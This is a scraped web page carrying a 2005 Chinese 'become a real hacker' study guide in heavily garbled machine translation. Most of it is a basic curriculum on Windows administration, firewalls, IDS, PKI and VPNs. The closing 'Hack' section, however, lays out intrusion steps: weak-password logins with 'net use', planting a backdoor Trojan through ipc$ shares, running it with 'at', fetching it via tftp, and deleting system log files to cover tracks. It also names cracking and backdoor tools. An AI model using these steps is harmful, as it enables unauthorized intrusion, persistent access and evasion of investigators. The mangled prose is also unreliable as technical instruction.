Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220052359
HistorySep 18, 2005 - 12:00 a.m.

Denial and then when the“script kids”to become a real hacker! - Vulnerability warning-the black bar safety net

2005-09-1800:00:00
佚名
www.myhack58.com
20
JSON

On hack how to make online with the n version. But mostly grandstanding.
Look at this now, is I online can see the detailed tutorial. I believe you will certainly have the benefits.
Transferred from: tsinghua bbs

Basis:
How to learn

·To have learning objectives
·Have a learning plan
·To have the right mindset
·There is a strong self-learning ability

Learning objectives
·1. Clear their own direction of development(do you now or in the future what to do,the programmer? Security expert? Network hacking, etc.)
·2. Their current level and ability and how high
·Simple operation windows2000
·Simple configuration of windows2000 some of the services
·Proficient in the configuration of Windows2000 variety of services
·Be proficient in the configuration of win2000 and a variety of network devices networking
·Simple operation Linux,Unix,Hp-unix, Solaris in one or more of theoperating system
·Be able to configure cicso,huawei,3com,lang Xun and other network equipment
·Be simple to write C/C++,Delphi,Java,PB,VB,Perl
·Can simple to write Asp,Php,Cgi and script,shell script

·3. Must learn not to believe attitude,respect for a wide variety of ability
·Not for those who die do kind of person a waste of time
·Respect other people’s ability,
·Will enjoy improving your own ability to pleasure.
·Know their level and ability after going to start your goals.
·-------- Security experts
·-------- Hack
·-------- Senior programmer
·Hacking is the construction of the network,not destroy the network, the saboteur is a Cracker;
·Hacker intrusion of technology,but they are the maintenance of network,it and security expert is about the same;
·Because knowing how to invasion only know how to maintain
·Because knowing how to maintenance it more to learn how to invasion
·This is hackers and security experts link
·But,they are in programming on the basis of growth!
·Here we start our learning plans!

Learning plan
With learning plans in order to more effective learning

Safety learning program
Don’t ask for the win98 how proficient,nor do we explain the win98 how to apply,how proficient,we start is win2000 s
erver,this is our training to the minimum standard,you English have some knowledge is also essential

The most basic
·a. Installed win2000,know that at the time of installation there are two kinds of partition formats,NTFS and FAT32 and their differences,know win2
0 0 0 may be at the time of installation partition,formatted hard disk, you can customize the installation,can be customized to your needs to install some components,if there is a network adapter,can be directly joined to the domain learning point:the NTFS and FAT32 partition of the different individual components of the role
The domain of definition
·b. Know how to open,shut down know write off the usefulness of
·c. Know win2000 below the main directory of the role of Documents and Settings,WINNT,system32 and Program Files
·d. Know the management tools inside the various components of the definition
·e. Learn to use the command prompt cmd(dos)
·f. Know Computer Management inside of each option not
·g. Know win2000 powerful network management function
·h. Can be very skilled operation win2000
·i. Know the IP Address,Subnet Mask,gateway and MAC of the difference

Advanced
·A. configure the IIS,to know the various options of action
·B. configure the DNS,DHCP
·C. configure the primary control domain,secondary domain
·D. configure the DFS
·E. configuring Routing and remote access

F. configure a security policy IPSEC
·G. configure the service(the service)
·H. configuration Disk Management,disk share
·i. Configuring RAID(0,1,0+1,5)
·J. router installation and simple configuration
·K. switch installation and simple configuration
·L. common VPN,VLAN,NAT configuration
·M. the configuration of the common enterprise-grade firewall
·N. configuration of the common enterprise-level anti-virus software

Senior
·Before we learned that any one want to become a network security expert and hacker basic knowledge of the part of the
·You made up???
·If you do,enough to find a very good work!

Configure load balancing
·Configure a WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+load balancing+ASP(PHP. CGI)+CHECK PIONT(ISASERVER) ·
·Configure the three-tier exchange network ·
·Configure a variety of complex network environment
·Be able to plan a very complete network solutions ·
·Can alone form a large enterprise network ·

·Able to quickly solve the network appeared in a variety of difficult problems

The end of the
·In the above you are learning,you are already a top talent,but also our VIP training goals!
·You can find a very good work
·Never again because the girlfriend couldn’t afford the roses and worry!

Security:
Review
·System security services(SYSTEM)
·The firewall system(FIREWALL)
·Intrusion detection(IDS)
·Authentication(CA)
·Website monitoring and recovery(WEBSITE)
·Secure e-Commerce(E-BUSINESS)
·Secure e-mail(E-MAIL)
·Secure office automation(OA)
·Internet access and monitoring(A&C)
·Virus prevention(VIRUS)
·Virtual LAN(VPN)

System security services

·System security management
·System safety assessment
·System security reinforcement
·System security maintenance
·Safety skills learning

System security management
·Information systems security policy
·Information Systems Administrator security manual
·Information systems user security manual
·Emergency management process

System safety assessment
1, the overall system safety analysis
· Analyze the user’s network topology, in order to identify its structural and network configuration on the security risks exist.
· By examining the user information of the device placed site, so that the device is physically secure.
· Analyze user information system of management, the use of the process, so that the system can be safely managed, safely use
2, The host systemsecurity testing
· Through to the host security scanning, to found a system of common security vulnerabilities.
· For a particular system, The use of a special tool for security scanning.
· According to the experience of the system loopholes to comprehensive analysis.
· Given a system security vulnerability report.

· Noted that the various security vulnerabilities to produce the reason and cause of the danger.
· Gives fix security vulnerabilities recommendations
3, a network devicesecurity testing
· Through the network security scan to find network security vulnerabilities.
· Based on the experience of network device vulnerabilities for a comprehensive analysis.
· Gives the network device the security vulnerability report.
· Noted that each of the security vulnerability causes as well as cause risks.
· Gives fix security vulnerabilities advice.

Security system reinforced
·As a user of the system playing the latest security patches.
·For the user to repair the system, the network of security vulnerabilities.
·For the user to remove unnecessary services and applications.
·For the user system to set the user permissions to access the policy.
·For users of the system setting file and Directory Access Policy.
·For the user system application for the corresponding security processing.

Security system maintenance
·The firewall system maintenance, securitylog analysis
·IDS system maintenance, securitylog analysis
·VPN system maintenance, securitylog analysis
·The authentication system maintenance, securitylog analysis

·Server, host system securitylog analysis
·Other types of security facilities maintenance andLog analysis

Safety skills training
·Network security basics
·Network attacks demo and preventive measures
·Firewall principles and use
·VPN principles and use
·Vulnerability scanning tools, principles and use
·IDS’sintrusion detectionthe system of principles and use
·Identity authentication system of the principles and use of
·Anti-virus products, the principles and the use of
·System administrator security training
·General user security training

Firewall system
·Firewall definition
·Firewall classification
·Packet filtering firewall
·Application gateway firewall
·Stateful inspection firewall
·General corporate firewall configuration

·Government agencies firewall configuration
·Involved in key networks confidential the gateway configuration
·High availability and load balancing firewall system
·High-speed firewall systems

Firewall definition
·To connect the different trust levels of the network device.
·Used to according to established security rules for the network communication between the control

Firewall classification
·Packet filtering (Packet Filters)
·Application gateway (Application Gateways)
·State detection(Stateful Inspection)

Packet filtering firewall
·Packet filtering technology
·Key on the router implementation, according to user-defined content, such as IP address, port number to be filtered. Packet filtering in the network
The network layer performs packet inspection and application-independent.
· Excellent point
· Has good performance and scalability.
· Disadvantages
· Due to the packet filtering technology is the application is not sensitive, can not understand the specific communication of meaning, and thus the security is very poor.

The application gateway firewall
·Application gateway technology
·The second generation of firewall technology, in the application of the inspection aspects have been greatly improved,can monitor all the application layer, while the corresponding
With“content”in the Content Information, the meaning of the introduction to the firewall policy of the decision-making process.
· Advantages
· AnnThe whole is relatively high.
· Disadvantages
· 1, The method for each request must establish two connections, one from client to firewall system, The Other from the firewall system to the server, which will seriously affect performance.
· 2, the firewall gateway is exposed to the attacker.
· 3, for every Agent needs to have a separate application process or daemon to process, so scalability and support for new applications a problem.

Detecting the state of the firewall
· Is a third-generation firewall technology, to overcome the above two methods of the disadvantage, the introduction of the OSI full seven-layer monitoring capability, while maintaining Client/Server architecture, i.e. user access is transparent.
· The firewall can protect, restrict other user on the firewall gateway itself access.
· State of the detection technology in the network layer intercepts packets to INSPECT the Engine,through the INSPECT Engine can be from the data packet to extract the security decision-making required of all stems from the application layer of the state information, and in the dynamic state table to maintain this information to provide subsequent connection to the possibility of prediction. The method can provide high security, performance and scalability, high scalability of the solution.

Intrusion detection system
·Processing attack when encountered typical problems
·Solve the invasion of ways and means
·Based on networkintrusion detection
·Host-basedintrusion detection
·Intrusion detectionsystem typical configuration

Treatment attacks the problems encountered
·The information obtained is insufficient
·Don’t to the network on what happened.
·Unable to determine whether the system has been compromised.
·Inaccurate information
·Less staff

·Not enough maintenance personnel to management.
·Lack of standardized processing procedures
·Find the time of the attack how to react?
·The next step how to deal with?

To solve the invasion of ways and means
·The use of intrusion real-time intrusion monitoring system(IDS)
·System, network events occurring in the real-time monitoring.

·When the occurrence of the intrusion event can be an instant reaction.
·Of the intrusion event detail recording and tracking.

Host-basedintrusion detection
·The software module is installed in the containing important data on the host
·Monitor theoperating systemthe log to find the attack characteristics.
·Monitoring agent to the host on all processes and the user.
·Monitor the violence in the login attack brute-force login, and trying to change or bypass the security settings, and privileges of abuse.
·When the newChi produce, in order to reduce the CPU impact, the agent program temporarily interrupted.

Network-basedintrusion detection
·Software installed on a dedicated host, placed in key network segments
·Will configure the software to the host’s NIC is set to promiscuous mode, so that the host can accept the network segment on all packages.
·Analyze data packets to determine whether there is a hacker attack.
·Monitor the network on all data.
·To the network traffic without any impact.
·Be able to detect denial of service attacks, unauthorized access attempts, pre-attack scans and other attacks.

Identity authentication system
·User authentication method

·Different authentication methods of the security level
·User authentication in the usual manner
·The solution to the problem
·Currently more Mature of the two-factor authentication method

User authentication
·You know some stuff
· Password, ID number, birth*
·You have something
· Magnetic card, smart card,token, key
·Your unique something.
· Fingerprint,voice, Retina

Password is insecure
·You can crack the Code of the tool too much
·Most of the password in the network is transmitted in the clear
·Password can network offline is the endoscopic test
·The password and the file from the PC and the server is transferred.
·Remember the password easy to guess,easy to guess passwords too hard to remember

Solution
·Use a mix of tools:such as an IC card+PIN

Website monitoring and restoration system
·A typicalWeb serverapplication
·The Web serverthe presence of security issues
·Website security solutions

Typicalweb serverapplication
·Internet - >router - >firewall - >web site
· |
· |
· Internal
·All put in behind the firewall

Web serverthe presence of security issues
· Page is illegal tampering is a website content provider is the most headache problem. In the use of a firewall, the Web serveris itself a vulnerability became the site is black the main problem.
· Web application server(such as IIS,Apache there are a lot of security vulnerabilities.)
· Users to develop their own CGI, ASP, PHP applications there exist a large number of potential vulnerabilities.

Website security
·Use ofWeb servermonitoring
With the recovery system

·The system provides to the site file contents of the real-time monitoring, found to be altered immediately after the alarm and automatic recovery.

E-Commerce security system
·A typical e-Commerce application
·E-Commerce in the presence of security issues
·E-Commerce security solutions
·Real-Time Data Exchange System

A typical e-Commerce application
·Internet—>firewall—>Web server
· || |
· || |
· The Internal(Database)

E-Commerce in the presence of security issues
·1, theWeb serverend
·The Web application server, such as IIS, Apache there are a lot of security vulnerabilities. Users to develop their own CGI, ASP, PHP applications, there is a potential vulnerability.
· Hack by these vulnerabilities to attack theWeb server, it can be illegal tampering with the page, resulting in adverse effects, shake up e-Commerce user confidence.
· Can even be obtainedWeb serveron a lot of sensitive information, such as user’s credit card number, to connect to the Internal Database account and password.

· Possible by controlling theWeb server to attack the Internal Database.

E-Commerce in the presence of security issues
·2, SSL Protocol
·SSL encryption strength is low. Due to the browser’s default encryption module only supports 4 0 bit of the low strength of the encryption, and even in the browser to install the higher encryption module, due to theWEB serverdoes not provide for high SSL links support the same can not achieve the high strength SSL encryption link.
· Unable to resolve e-Commerce in the user signature. SSL to establish a linkthe WEB serverand the user between the browser and the secure channel can only be guaranteed in a secure channel the information within is not to be eavesdropping or tampering, and can not for the information sent by the user to be signed in order to ensure the validity of the information and non-repudiation, and this is where e-Commerce must be addressed.

E-Commerce security solutions
·TheWEB serveris divided into two parts: General content ofWEB serverand the transaction[the WEB server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm&gt; a).
· The General content ofWEB serveris placed in the DMZ zone, using WEB site monitoring and recovery system protection, to prevent the home from being illegally altered.
· TransactionWEB serveris placed internally within the network, through a physical separation of Real-Time Data Exchange System with the DMZ zone is connected.
· In the client and server-side installation of SSL proxy, thereby obtaining a 1 2 8-bit high strength encryption channel

Real-Time Data Exchange System
·The system of external Web serverand internal appWeb serverphysically separated.
·ExternalWeb serveris used to store the General information, the internal Web server used to store sensitive information, and internal database connection.
·The external user through the http access in the DMZ zone within the General[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm&gt; a).
·When trading, users need to access in the intranet within the application server.
·https connection first to reach the real-time data exchange system of the virtual externalWeb server, real-time data exchange system will be https
The agreement to unravel, only the https connection to the data contents are copied to the virtual internalWeb server, the virtual internalWeb serverwill use the data to re-initiate the https connection to the actual internal appWeb server.
·Inside and outside through real-time data exchange system for data exchange, without any Protocol and connection through the real-time Data Exchange System.
·Even if the DMZ area ofWeb serverattack, the attacker is also less than any useful information

Secure e-mail system
·E-mail Security
·Secure e-mail solution
·A secure message using the process

E-mail Security
·How to ensure transmission of sensitive information is not leaked
·How to ensure that the transmitted information is not tampered with
·How to confirm the sender’s true identity
·How to prevent the sender’s repudiation behavior

Secure e-mail solution
·The PKI system applied to a mail system

·Message encryption and decryption to achieve data confidentiality.
·Mail-digital signature authentication for sender authentication and non-repudiation of.
·Integrity check function to prevent information transmission process of being tampered with reliable security.
·The use of public key and symmetric key combined with the key system.
·Support for 128bit symmetric key algorithm and 1024bit public key algorithm.

Office Automation System Security
· How to ensure transmission of sensitive information is not leaked
· How to ensure that the transmitted information is not tampered with
· How to confirm the sender’s true identity
· How to prevent the sender’s repudiation behavior

Security office automation system solutions
·The PKI system application to office automation system
·Workflow information of encryption and decryption to achieve data confidentiality
·Workflow information, the digital signature authentication for sender authentication and non-repudiation of.
·Integrity check function to prevent information transmission process of being tampered with reliable security.
·The use of public key and symmetric key combined with the key system
·Support for 128bit symmetric key algorithm and 1024bit public key algorithm.

Internet access and control system
·Internet use problems

·The Internet use the workaround
·The contents of the cache system
·An Internet site filtering system

Internet access problems
·Internet access bandwidth is insufficient, access is slower.
·A large number of users to access the same content, the resulting bandwidth is further crowded.
·During office hours where a lot of the Internet access is business-related.
·Someone is using the company Internet system to access**web site.
·Someone is using the company Internet system to access the reactionary site.
·Managers can not know the Internet system usage.

Internet access solutions
· For question a, using the contents of the cache system.
· For question two, the use of the Internet site filtering system.

The contents of the cache system
·1, The Client initiates the http connection request
·2, the Proxy receives the request checks the internal cache if you have the required content, if any, is returned to the Client.
·3, If no, then the Proxy according to the request to the destination server to initiate the request.
·4, theWeb serverthe content is returned to the Proxy server.
·5, the Proxy server will get the content sent back to the Client, and in their own cache to save a copy.

Internet site filtering system (a)
·1, The Client initiates the http connection request
·2, the connection arrives at the firewall when the firewall will be the URL sent to the WebSense Server check.
·3, WebSense will review the results back to the firewall.
·4, firewall according to its policy decision whether to let the connection through.
Internet site filtering system (II)
·1, The Client initiates the http connection request
·2, Proxy by request after the URL is sent to the WebSense Server check.
·3, Proxy based on the return of results to decide whether to accept the connection request.

Virus preventionsystem
· The Internet era of the anti-virus System Requirements
· Computer virus solution
· A typicalvirus preventionsystem deployment

The age of the Internet of anti-virus System Requirements
· Due to the computer networking use, so that the spread of the virus pathway is greatly increased: the Network File Share, e-mail, Internet file downloads, the propagation speed is also greatly accelerated.
· The new virus appears to accelerate the speed, the user’s anti-virus software virus signatures failed to timely updates.
· Currently there has been a malicious Java, ActiveX, when the user browse to the containing the Code of the web page, it will cause security issues.

· Some of the unsolicited e-mail program or download the program with a Trojan horse that may cause the victim host is others control.

Computer virus solution
· From the system viewpoint virus protection at all virus transmission routes are configured anti-virus software, such as client Win98, · Win2000), file server(NT, Netware, email servers, Exchange, Lotus
Notes, the Internet access system, Proxy, Firewall), etc.
· The entirevirus preventionthe system uses the centralized management mode, the characteristics of the virus code unification update, the security policy is centrally set, so that the entire network system of the virus signatures to give a quick update.
· By the client browser and the Proxy, the Firewall embedded in the virus checking software to prevent the next in the program with viruses and possible malicious Java, ActiveX, and other executable code attack.

VPN(virtual private network)
· Data encryption classification
· Physical line encryption
· Data Link encryption
· Network layer encryption—IPSec
· Transport Layer encryption—SSL

Data encryption type
·Physical layer->physical layer physical line encryption
·Data Link Layer->Data Link Layer (router access)

·At the Data Link Layer(e.g. PPP for encryption L2TP, PPTP AND L2F
·Network layer->network layer(router, firewall, host)
·In the network layer such as IP encryption IPSec
·Transport Layer->Transport Layer (TCP for encrypted SSL)
·Application layer->application layer(the application layer (such as TCP for encrypted S/MIME, SET, SSH)

Physical line encryption
· DDN encryption machine
· Frame Relay encryption machine
· Asynchronous dial-up Modem
· ISDN line cipher machine
· ATM Encryptor

Note:Transport Layer encryption
·Secure Sockets Layer (SSL) is an end-to-end Internet security protocols, through the use of a digital certificate, which provides data encryption, identity authentication function. SSL established at the Transport Layer, it is Client and server at the application level to establish an end-to off the secure session.
·SSL-proxy—1 2 8-bit high-strength encryption module
Conclusion·congratulations on your:
·Completion of these and can skilled application,is already a real network security experts!
·Hope at this time next to you has a gentle and a little bit naughty girlfriend,for this solitude and loneliness of the network to add a little Jumpy colors!

Hack:
Must be the palmHolding several commands
·Net
·netsh
·Ftp
·hostname
·
Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping

Have to master several protocols
·http
·dns
·ftp
·Pop
·Smtp

·Icmp
·Udp
·tcp

Start
·Master the hacking ways and Tools,then learning to hack is much simpler!
·Because you have mastered these,the remaining is to use the tools of the invasion
·Familiar with a set of their own use of the hack tool

Senior
·Write your own dedicated hack tool
·Discovered system vulnerabilities

Hacking means
·Collect information:
· Collection want to invade the target information
· IP,domain,port,vulnerability,location

Weak passwords
·In the nt\2 0 0 0\xp\2 0 0 3 weak password can be used
·Net use \ip “password” /user:user
·If the target machine open 3 3 8 9 service,can be directly connected
·The sql sa weak password,you can use sql connector directly ·login

Backdoor Trojan
·If there is a ipc$share,you can copy past the Trojan back door
·Use at start
·AT the \ \ ip time /INTERACTIVE
·If you can get a shell,you can also use tftp
·Tftp.exe –i ip get . .
·Then install ·if there are 3 3 8 9,can be built yourself a iis,download direct run

Password hack
·Remote crack mysql,mssql,ftp,mail,share the password
·The local crack administrator(administrator)password

Buffer overflow
·Can be used in buffer overflow attacks,
·Such as the popular webdev,rdcom module vulnerability
·Can directly obtain system Management privileges
·Buffer overflow after the General phenomenon is:
·Microsoft Windows 2 0 0 0 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>

The Web service vulnerability
·For example:
·Unicode vulnerability to traverse the disk and execute the program
·Secondary coding vulnerabilities to traverse the disk and execute the program
·. HTR vulnerability to view the source code

Sniffing visits to listen to
·For example:
·For the web listener
·For mail monitor
·Tools such as:sinffer , iris

Spoofing attacks
·For example:
·The use of arp spoofing attack

Camouflage to deceive
·Common such as:mail viruses
·Put a file to change the name or even the icon,to deceive the other party to perform

Social engineering

·For example:
·QQ chat seduction
·EMAIL information
·Telephone
·Temptation

Denial of service
·For example:
·Dos attacks
·Ddosattack

The use of springboard
·Use your broiler as a springboard to attack other machines
·My PC------>springboard(broiler)—>target

Router vulnerability
·Such as:
·The original password
·Bug

Firewall
·The use of deception to attack the firewall,cause the firewall function failure

·Use the firewall module vulnerability

unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix, etc.
·These are currently not explained

Mastery hack tool
·Must have a set of your own can fully grasp hack tool
·Such as port scan Nscan,bluescanport
·Monitoring tools:sinffer iris
·the telnet tool:nc
·Scan tool:sss,nmap, LANguard
·Backdoor tools:radmin,winshell
·Password cracking:lc4
·Remote management:pcanywhere
·Will use a variety of classic hack tool

ClearChi
·In your invasion of the machine later,time to leave,to completely clear
·Own in that machine on the left traces
·For example, to clear the
·Del C:\WINNT\system32\LogFiles\.*

·Del C:\WINNT\system32\. log
·Del C:\WINNT\system32\. txt
·Del C:\WINNT\. log
·Del c:\winnt\. txt

If you do not clearChi
·When the target machine’s admin found your evidence
·Absolutely can let you at the Great Wall through a section of thesub -

Hack
·When you fully grasp these after
·You become a small hack

Senior
·Write your own hack tool
·Discover system vulnerabilities

Advanced hacker
·Currently you sufficient to become an advanced hacker.

The real hackers
·Proficient in various network protocols

·Proficient in theoperating system
·Proficient in programming techniques
·Proficient in thesecurity guard
·Do not vandalize
·Challenging technical problems

The end of the
·Want to learn these,and not rely on others to give you,but by their own efforts,your own self-study to get!
·Others can only guide you,how to do,can only tell the method,
·The real implementation is your own,after NNnight effort to
·It is not a question asked many times,to be more hands-on,brains!
·Google there are so many answers,why I can not search? Because your keywords are not!
·Hacker base in order to cultivate a group of outstanding web talent,let more want to learn the network of enthusiasts there is an ideal school
Learning environment
·This three-part slide is our many years of experience to give!
·Very valuable,desired a good save! Carefully research!

Technology pinnacle
·Hope we can be here together!

JSON